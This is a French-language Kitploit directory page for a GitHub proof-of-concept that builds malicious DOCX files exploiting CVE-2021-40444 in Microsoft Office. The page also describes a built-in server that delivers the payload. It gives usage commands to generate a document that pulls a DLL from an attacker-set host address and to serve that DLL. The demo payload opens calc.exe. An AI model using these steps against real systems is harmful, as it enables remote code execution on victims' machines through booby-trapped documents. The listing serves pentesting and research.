Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx — Génère des fichiers DOCX malveillants exploitant CVE-2021-40444 pour exécuter du code à distance via des documents Office conçus à cet effet, avec un serveur d'hébergement intégré pour la livraison de la charge utile. | Kitploit
Outils/GitHubGitHub/w1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse de MalwareCommandement et Contrôle
GitHubw1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx

Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx

Génère des fichiers DOCX malveillants exploitant CVE-2021-40444 pour exécuter du code à distance via des documents Office conçus à cet effet, avec un serveur d'hébergement intégré pour la livraison de la charge utile.

Voir le dépôt
12il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-40444 PoC

Générateur de documents docx malveillants pour exploiter CVE-2021-40444 (exécution de code à distance dans Microsoft Office Word)

La création de ce script repose sur une ingénierie inverse de l'échantillon utilisé en conditions réelles : 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (fichier docx)

Vous devez d'abord installer lcab (sudo apt-get install lcab)

Consultez REPRODUCE.md pour les étapes de reproduction manuelle

Si votre cab généré ne fonctionne pas, essayez de pointer l'URL d'exploit.html vers calc.cab

Utilisation

Générez d'abord un document docx malveillant à partir d'une DLL ; vous pouvez utiliser celle située dans test/calc.dll qui ouvre simplement calc.exe via un appel à system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

Une fois le docx malveillant généré (il sera dans out/), vous pouvez mettre en place le serveur :

sudo python3 exploit.py host 80

Server

Enfin, essayez le docx dans une machine virtuelle Windows :

Pop Calc

Télécharger l’outil